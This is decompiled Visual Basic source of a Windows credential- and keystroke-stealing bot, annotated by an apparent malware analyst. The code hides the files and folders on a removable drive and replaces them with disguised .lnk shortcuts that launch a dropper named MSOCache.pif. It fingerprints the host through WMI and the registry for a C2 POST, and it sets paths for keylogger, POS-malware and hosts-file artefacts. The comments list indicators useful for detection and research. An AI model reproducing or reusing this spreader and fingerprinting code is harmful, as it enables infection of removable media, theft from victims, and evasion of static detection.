loc_408924: LateMemCallLdVar
loc_408932: CAdVar
' Root files of the drive.
loc_408946: For Each var_9C In MemVar_402104.Files
loc_408972: If CBool(InStr(1, var_9C.Name, ".", 0)) Then
loc_4089A8: arg_2008 = Split(CStr(var_9C.Name), ".", -1, 0)
loc_4089B2: var_90 = arg_2008
' Skip files that are already shortcuts.
loc_4089DD: If (LCase$(var_90(UBound(var_90, 1))) <> "lnk") Then
loc_4089EB: var_9C.Attributes = 6
loc_408A04: If CBool(var_9C.Name <> "MSOCache.pif") Then
loc_408A38: var_118 = var_98.Path & "\" & CVar(var_90(0)) & "." & "lnk"
loc_408A42: LateMemCallLdVar
loc_408A4A: CAdVar
' Look up the default icon for the file's extension so the .lnk looks
' like the original file.
loc_408A61: var_108 = "HKLM\software\classes\"
loc_408A8C: LateMemCallLdVar
loc_408A9D: var_F8 = CVar("HKLM\software\classes\" & "." & var_90(UBound(var_90, 1)) & "\") & MemVar_402104 & "\defaulticon\"
loc_408AA7: LateMemCallLdVar
loc_408AB0: var_88 = CStr(MemVar_402104)
loc_408ACC: Set var_180 = MemVar_402104
loc_408ADB: var_180.windowstyle = 7
loc_408AEA: var_180.targetpath = "cmd.exe"
loc_408AFC: var_180.workingdirectory = CVar(0)
' Spaces in names are wrapped as `" "` so cmd treats them as one token.
loc_408B89: var_1A8 = "/c " & "start " & Replace("MSOCache.pif", " ", """" & " " & """", 1, -1, 0) & "&" & "start " & Replace(CStr(var_9C.Name), " ", """" & " " & """", 1, -1, 0)
loc_408B97: var_180.arguments = CVar(var_1A8 & "&exit")
' Registry icon values look like "path,index"; fall back to the file path.
loc_408BD3: If CBool(InStr(1, var_88, ",", 0)) Then
loc_408BE2: var_180.iconlocation = CVar(var_88)
loc_408BE9: Else
loc_408BF7: var_180.iconlocation = var_9C.Path
loc_408BFE: End If
loc_408C03: Call var_180.save
loc_408C0D: Set var_180 = Nothing
loc_408C11: End If
loc_408C13: End If
loc_408C15: End If
loc_408C1C: Next
loc_408C31: var_C0 = var_98.Path & "\"
loc_408C3B: LateMemCallLdVar
loc_408C49: CAdVar
' Root subfolders of the drive.
loc_408C5D: For Each var_A0 In MemVar_402104.subfolders
loc_408C6E: var_A0.Attributes = 6
loc_408C9F: var_128 = var_98.Path & "\" & var_A0.Name & "." & "lnk"
loc_408CA9: LateMemCallLdVar
loc_408CB1: CAdVar
loc_408CD8: var_B0 = CVar("HKLM\software\classes\" & "folder" & "\defaulticon\") 'String
loc_408CE1: LateMemCallLdVar
loc_408CEA: var_8C = CStr(MemVar_402104)
loc_408CFC: Set var_1B4 = MemVar_402104
loc_408D0B: var_1B4.windowstyle = 7
loc_408D1A: var_1B4.targetpath = "cmd.exe"
loc_408D2C: var_1B4.workingdirectory = CVar(0)
loc_408DC0: var_1B8 = "/c " & "start " & Replace("MSOCache.pif", " ", """" & " " & """", 1, -1, 0) & "&" & "start " & "explorer " & Replace(CStr(var_A0.Name), " ", """" & " " & """", 1, -1, 0)
loc_408DCE: var_1B4.arguments = CVar(var_1B8 & "&exit")
loc_408E0C: If CBool(InStr(1, var_8C, ",", 0)) Then
loc_408E1B: var_1B4.iconlocation = CVar(var_8C)
loc_408E22: Else
loc_408E30: var_1B4.iconlocation = var_A0.Path
loc_408E37: End If
loc_408E3C: Call var_1B4.save
loc_408E46: Set var_1B4 = Nothing
loc_408E4F: Next
loc_408E55: End If
loc_408E5C: Next
loc_408E64: Exit Sub
End Sub
' Returns (in var_88) the DisplayName of the first AntivirusProduct found via
' WMI. The namespace is root\SecurityCenter, or root\SecurityCenter2 when the
' registry CurrentVersion value (read late-bound into MemVar_402104) is > 6.
' Only the first result is examined: Exit For sits outside the If.
' The recovered signature has no parameters although fingerprint_system passes
' one; that call is the decompiler's rendering of string concatenation.
Public Sub fetch_av_products
'Data Table: 401634
Dim var_A8 As Variant
Dim var_F8 As Variant
Dim var_D8 As Long
loc_404F94: On Error Resume Next
loc_404F9C: var_8C = "SecurityCenter"
loc_404FAF: var_A8 = CVar("HKLM" & "\Software\Microsoft\Windows NT\CurrentVersion\" & "CurrentVersion") 'String
loc_404FB8: LateMemCallLdVar
' Newer Windows versions expose AV data under SecurityCenter2.
loc_404FD2: If (MemVar_402104 > 6) Then
loc_404FE2: var_8C = var_8C & CStr(2)
loc_404FE8: End If
loc_404FF1: var_F8 = CVar("select * from " & "AntivirusProduct") 'String
loc_405014: VarLateMemCallLdVar
loc_40501C: CAdVar
loc_40503A: For Each var_94 In GetObject(CVar("winmgmts:" & "\\.\root\" & var_8C), var_D8)
loc_405059: If (Len(var_94.DisplayName) > 0) Then
loc_405067: var_88 = CStr(var_94.DisplayName)
loc_40506D: End If
loc_40506F: Exit For
loc_40507A: Next
loc_405082: Exit Sub
End Sub
' Returns "1" in var_88 if WMI "select * from win32_Battery" yields any rows,
' else "0". Used as one field of the host fingerprint; a battery check like
' this is commonly a laptop/virtual-machine heuristic (inference).
Public Sub is_battery_present
'Data Table: 401634
Dim var_F0 As Variant
loc_404440: On Error Resume Next
loc_404453: var_F0 = CVar("select * from " & "win32_" & "Battery") 'String
loc_404470: VarLateMemCallLdVar
loc_404478: CAdVar
loc_4044A3: If (GetObject("winmgmts:", var_D0).Count > 0) Then
loc_4044AB: var_88 = "1"
loc_4044B1: Else
loc_4044B6: var_88 = "0"
loc_4044B9: End If
loc_4044BB: Exit Sub
End Sub
' Returns (in var_88) the Name of the first win32_Processor WMI instance.
' The class name is built from fragments ("win32_" & "Process" & "or"),
' presumably to hinder static string matching. Exit For sits outside the If,
' so only the first instance is ever examined.
Public Sub fetch_processor
'Data Table: 401634
Dim var_F4 As Variant
Dim var_D4 As Long
loc_404AF8: On Error Resume Next
loc_404B0B: var_F4 = CVar("win32_" & "Process" & "or") 'String
loc_404B28: VarLateMemCallLdVar
loc_404B30: CAdVar
loc_404B32: Set var_8C = GetObject("winmgmts:", var_D4)
loc_404B5B: If (var_8C.Count > 0) Then
loc_404B66: For Each var_90 In var_8C
loc_404B85: If (Len(var_90.Name) > 0) Then
loc_404B93: var_88 = CStr(var_90.Name)
loc_404B99: End If
loc_404B9B: Exit For
loc_404BA6: Next
loc_404BAC: End If
loc_404BB0: Exit Sub
End Sub
' Returns (in var_88) the Caption of the first win32_VideoController instance
' whose VideoProcessor is non-empty. Only the first instance is examined
' (Exit For is outside the If).
Public Sub fetch_video_controller
'Data Table: 401634
Dim var_F0 As Variant
Dim var_D0 As Long
loc_4048E0: On Error Resume Next
loc_4048EC: var_F0 = CVar("win32_" & "VideoController") 'String
loc_404909: VarLateMemCallLdVar
loc_404911: CAdVar
loc_404913: Set var_8C = GetObject("winmgmts:", var_D0)
loc_404939: If (var_8C.Count > 0) Then
loc_404944: For Each var_90 In var_8C
loc_404963: If (Len(var_90.VideoProcessor) > 0) Then
loc_404971: var_88 = CStr(var_90.Caption)
loc_404977: End If
loc_404979: Exit For
loc_404984: Next
loc_40498A: End If
loc_40498E: Exit Sub
End Sub
' Sets the global VOL_SERIAL (the bot's per-host identifier) from the
' VolumeSerialNumber of the first win32_LogicalDisk instance. If that serial is
' empty, it falls back to a persisted 8-character random value stored with
' VB's SaveSetting/GetSetting under app name "L!NK", section "1", key "0"
' (VB stores these under HKCU\Software\VB and VBA Program Settings\<app>),
' generating and saving it first when missing or not 8 characters long.
' Both branches Exit For, so only the first disk is considered.
Public Sub fetch_logical_disks
'Data Table: 401634
Dim var_F0 As Variant
Dim var_A0 As Variant
Dim var_D0 As Long
loc_40523C: On Error Resume Next
loc_40524F: var_F0 = CVar("select * from " & "win32_" & "LogicalDisk") 'String
loc_40526C: VarLateMemCallLdVar
loc_405274: CAdVar
loc_405292: For Each obj In GetObject("winmgmts:", var_D0)
loc_4052A6: var_A0 = 0
loc_4052B1: If (Len(obj.VolumeSerialNumber) > var_A0) Then
loc_4052BF: VOL_SERIAL = CStr(obj.VolumeSerialNumber)
loc_4052CA: Exit For
loc_4052D3: Else
' Fallback identifier persisted in the registry ("L!NK" is a usable IoC).
loc_4052F6: If (Len(GetSetting("L!NK", "1", "0", var_A0)) <> 8) Then
loc_40530C: SaveSetting("L!NK", "1", "0", make_random_string(var_F0))
loc_405314: End If
loc_405328: VOL_SERIAL = GetSetting("L!NK", "1", "0", var_A0)
loc_405330: Exit For
loc_405336: End If
loc_40533D: Next
loc_405345: Exit Sub
End Sub
' Returns (in var_88) the installed RAM in GiB: TotalPhysicalMemory of the
' first win32_ComputerSystem instance divided by &H40000000 (2^30), formatted
' with FormatNumber. The recovered signature has no parameters although
' fingerprint_system passes one (decompiled string concatenation).
Public Sub fetch_system
'Data Table: 401634
Dim var_F4 As Variant
Dim var_D4 As Variant
loc_404D30: On Error Resume Next
loc_404D43: var_F4 = CVar("select * from " & "win32_" & "ComputerSystem") 'String
loc_404D60: VarLateMemCallLdVar
loc_404D68: CAdVar
loc_404D86: For Each obj In GetObject("winmgmts:", var_D4)
loc_404DA5: If (Len(obj.TotalPhysicalMemory) > 0) Then
loc_404DDE: var_88 = FormatNumber((obj.TotalPhysicalMemory / &H40000000), -1, -2, -2, -2)
loc_404DEA: Exit For
loc_404DF0: End If
loc_404DF7: Next
loc_404DFF: Exit Sub
End Sub
' Builds the name used for uploaded files: VOL_SERIAL & "." & <letter>, where
' the letter is chosen by index from the table a,b,c,d,e,i,f,g,h (note the
' out-of-order 'i' at index 5). Callers pass the module index (0..5 from
' Proc_0_30_4060D8, 6 for "ss.c"), so the suffix letter identifies the module
' that produced the data -- useful when reconstructing exfiltrated files.
Public Sub Proc_0_49_404F40(index) '404F40
'Data Table: 401634
loc_404E5C: On Error Resume Next
loc_404E81: ReDim _arr(0 To 8)
loc_404E98: _arr(0) = 97 'a
loc_404EA6: _arr(1) = 98 'b
loc_404EB4: _arr(2) = 99 'c
loc_404EC2: _arr(3) = 100 'd
loc_404ED0: _arr(4) = 101 'e
loc_404EDE: _arr(5) = 105 'i
loc_404EEC: _arr(6) = 102 'f
loc_404EFA: _arr(7) = 103 'g
loc_404F08: _arr(8) = 104 'h
loc_404F2C: var_88 = VOL_SERIAL & "." & ChrW$(CLng(Array(_arr)(index)))
loc_404F3F: Exit Sub
End Sub
' Produces 8 pseudo-random characters from "ABCDEF0123456789" (upper-case hex
' alphabet) using VB's Randomize/Rnd and returns them in var_88. Used for drop
' file names in %TEMP% and for the fallback host id in fetch_logical_disks.
' No parameters were recovered, yet callers pass a directory (e.g. TEMP_DIR);
' whether the result is prefixed with it is not visible here -- confirm.
Public Sub make_random_string
'Data Table: 401634
loc_4042D8: On Error Resume Next
loc_4042E0: Randomize(var_AC)
loc_4042F7: For var_B4 = 1 To 8: var_8C = var_B4 'Long
' Rnd * 16 + 1 selects one character position in the 16-char alphabet.
loc_40432C: var_88 = var_88 & Mid$("ABCDEF0123456789", CLng(Int(((Rnd(var_AC) * CDbl(&H10)) + CDbl(1)))), 1)
loc_40433E: Next var_B4 'Long
loc_404345: Exit Sub
End Sub
' Builds the host fingerprint posted to the C2 and stores it in Me(12) as
' "<3-char id>=<Proc_0_18_405D30(record)>". The id is the first, last and 16th
' character of Me(124), lower-cased.
'   arg_C : when non-empty, the record is just 14 "|" separators followed by
'           arg_C (a report payload); otherwise a "|"-separated record is
'           collected: COMPUTERNAME, USERNAME, USERDOMAIN, ProductName from
'           HKLM\Software\Microsoft\Windows NT\CurrentVersion (late-bound
'           registry read), AV product, VOL_SERIAL, the literal "L!NK",
'           HOMEDRIVE size in GiB, CPU name, GPU caption, two "0"/"1" flags
'           and the battery flag.
' The nested fetch_*(...) calls are the decompiler's rendering of string
' concatenation; those routines take no parameters.
' Environment-variable names are assembled from fragments ("COMPUTER" &
' "Name"), presumably to hinder static string matching.
Public Sub fingerprint_system(arg_C) '407E60
'Data Table: 401634
Dim var_B4 As Variant
Dim var_174 As String
Dim var_1B0 As String
loc_407B30: On Error Resume Next
loc_407B7D: var_88 = LCase$(Left$(Me(124), 1) & Right$(Me(124), 1) & Mid$(Me(124), &H10, 1))
loc_407B9C: If (Len(arg_C) <> 0) Then
loc_407BBD: var_8C = String$(&HE, "|") & arg_C
loc_407BC9: Else
loc_407BDC: var_C4 = Environ$(CVar("COMPUTER" & "Name"))
loc_407BF3: var_C8 = Environ$(CVar("USER" & "Name"))
loc_407C0A: var_DC = Environ$(CVar("USER" & "DOMAIN"))
loc_407C27: var_B4 = CVar("HKLM" & "\Software\Microsoft\Windows NT\CurrentVersion\" & "Product" & "Name") 'String
loc_407C30: LateMemCallLdVar
loc_407C39: var_CC = CStr(MemVar_402104)
loc_407C79: LateMemCallLdVar
' Size of the HOMEDRIVE volume in GiB (&H40000000 = 2^30).
loc_407C9F: var_D0 = FormatNumber((MemVar_402104.TotalSize / &H40000000), CVar(Environ$("HOMEDRIVE")), -1, -2, -2)
' PROCESSOR_ARCHITEW6432 exists only for a 32-bit process under WOW64 on
' 64-bit Windows; var_D4 = "1" therefore means the variable is absent.
loc_407CC4: var_B4 = CVar("Process" & "OR_ARCHITEW" & CStr(6432)) 'String
loc_407CE2: If (Len(Environ$(var_B4)) = 0) Then
loc_407CEA: var_D4 = "1"
loc_407CF0: Else
loc_407CF5: var_D4 = "0"
loc_407CF8: End If
' Unresolved API call rendered as CopyMemory(-2, ...); the original callee
' (some boolean check yielding var_D8) was not recovered -- confirm.
loc_407CFF: If CopyMemory(-2, var_B4, ) Then
loc_407D07: var_D8 = "1"
loc_407D0D: Else
loc_407D12: var_D8 = "0"
loc_407D15: End If
loc_407D7E: var_174 = fetch_system(fetch_av_products(var_C4 & "|") & "|" & var_CC & "|" & VOL_SERIAL & "|" & "L!NK" & "|" & var_C8 & "|") & "|"
loc_407DE1: var_1B0 = is_battery_present(fetch_video_controller(fetch_processor(var_174) & "|") & "|" & var_D0 & "|" & var_D4 & "|" & var_D8 & "|") & "|"
loc_407DEF: var_8C = var_1B0 & var_DC & "|"
loc_407E33: End If
' Me(12) is the POST body source used by cnc_post_and_read.
loc_407E4D: Me(12) = var_88 & "=" & Proc_0_18_405D30(var_8C)
loc_407E5C: Exit Sub
End Sub
' Maps a small integer to a COM ProgID (returned in var_88):
'   0 -> "WScript.Shell"             3 -> "Shell.Application"
'   1 -> "Scripting.FileSystemObject" 4 -> "MSXML2.DOMDocument"
'   2 -> "MSXML2.ServerXMLHTTP"
' The strings are split into concatenated fragments, presumably to hinder
' static string matching. Any other value leaves var_88 unset.
Public Sub get_object_type(type) '404408
'Data Table: 401634
Dim _type As Long
loc_40438B: _type = type
loc_404397: If (_type = 0) Then
loc_4043A1: var_88 = "WScript." & "Shell"
loc_4043A7: Else
loc_4043B0: If (_type = 1) Then
loc_4043B6: var_88 = "Scripting.FileSystemObject"
loc_4043BC: Else
loc_4043C5: If (_type = 2) Then
loc_4043CF: var_88 = "MSXML2." & "ServerXMLHTTP"
loc_4043D5: Else
loc_4043DE: If (_type = 3) Then
loc_4043E8: var_88 = "Shell" & ".Application"
loc_4043EE: Else
loc_4043F7: If (_type = 4) Then
loc_404401: var_88 = "MSXML2." & "DOMDocument"
loc_404404: End If
loc_404404: End If
loc_404404: End If
loc_404404: End If
loc_404404: End If
loc_404404: Exit Sub
End Sub
' Initialises the bot's global COM objects and path constants. Resulting
' on-disk artefacts (IoCs for this sample):
'   <MY_DIR> = App.Path\ (the bot's own directory)
'     log.c, dwn.exe, keys.c, Off.c, win.c (plus ss.c / email.txt elsewhere)
'   <APPDATA>\POS.exe, <APPDATA>\output.txt
'   Me(52)\Me(144)\<MY_APPNAME>.exe -- install path; Me(52) is the directory
'     named by the environment variable Me(136), or %TEMP% if it does not
'     exist (Proc_0_14_403F14 presumably tests existence).
'   Me(40) = the "Startup" special folder (late-bound lookup), used for the
'     autostart copy removed in modify_bot_install.
'   HOSTS_PATH = %WINDIR%\system32\drivers\etc\hosts (deleted by command 10).
' Note MY_APPNAME is read (bare name) and then overwritten with the full path.
Public Sub init_globals
'Data Table: 401634
Dim var_B0 As Variant
loc_406B60: CAdVar
loc_406B62: WSCRIPT_OBJ = CreateObject(get_object_type(0), 0)
loc_406B8E: CAdVar
loc_406B90: SCRIPTINGFSO_OBJ = CreateObject(get_object_type(1), 0)
loc_406BBC: CAdVar
loc_406BBE: MSXML_OBJ = CreateObject(get_object_type(2), 0)
loc_406BE1: TEMP_DIR = Environ$("TEMP") & "\"
loc_406C04: APPDATA_DIR = Environ$("APPDATA") & "\"
loc_406C27: WINDIR = Environ$("WINDIR") & "\"
loc_406C3F: var_B4 = Me.Global.App
loc_406C53: MY_DIR = App.Path & "\"
' Startup folder via a late-bound call (arguments dropped by the decompiler).
loc_406C5F: var_B0 = "Startup"
loc_406C6A: LateMemCallLdVar
loc_406C7C: Me(40) = CStr(MemVar_402104 & "\")
loc_406C99: SYSTEM32_DIR = WINDIR & "system32" & "\"
loc_406CAB: HOSTS_PATH = SYSTEM32_DIR & "drivers\etc\hosts"
' Install directory: %<Me(136)>%\ if it exists, else %TEMP%\.
loc_406CC7: var_88 = Environ$(Me(136)) & "\"
loc_406CDB: If Not(Proc_0_14_403F14(var_88, 0)) Then
loc_406CE3: Me(52) = TEMP_DIR
loc_406CEB: Else
loc_406CEE: Me(52) = var_88
loc_406CF3: End If
loc_406D15: MY_APPNAME = Me(52) & Me(144) & "\" & MY_APPNAME & ".exe"
loc_406D34: LOGNAME = MY_DIR & "log" & ".c"
loc_406D46: DWN_EXE = MY_DIR & "dwn.exe"
loc_406D53: POS_EXE = "POS" & ".exe"
loc_406D69: KEYS_C = MY_DIR & "keys" & ".c"
loc_406D7D: POS_PATH = APPDATA_DIR & POS_EXE
loc_406D8C: OUTPUT_TXT = APPDATA_DIR & "output.txt"
loc_406DA2: OFF_C = MY_DIR & "Off" & ".c"
loc_406DBB: WIN_C = MY_DIR & "win" & ".c"
loc_406DC4: Exit Sub
End Sub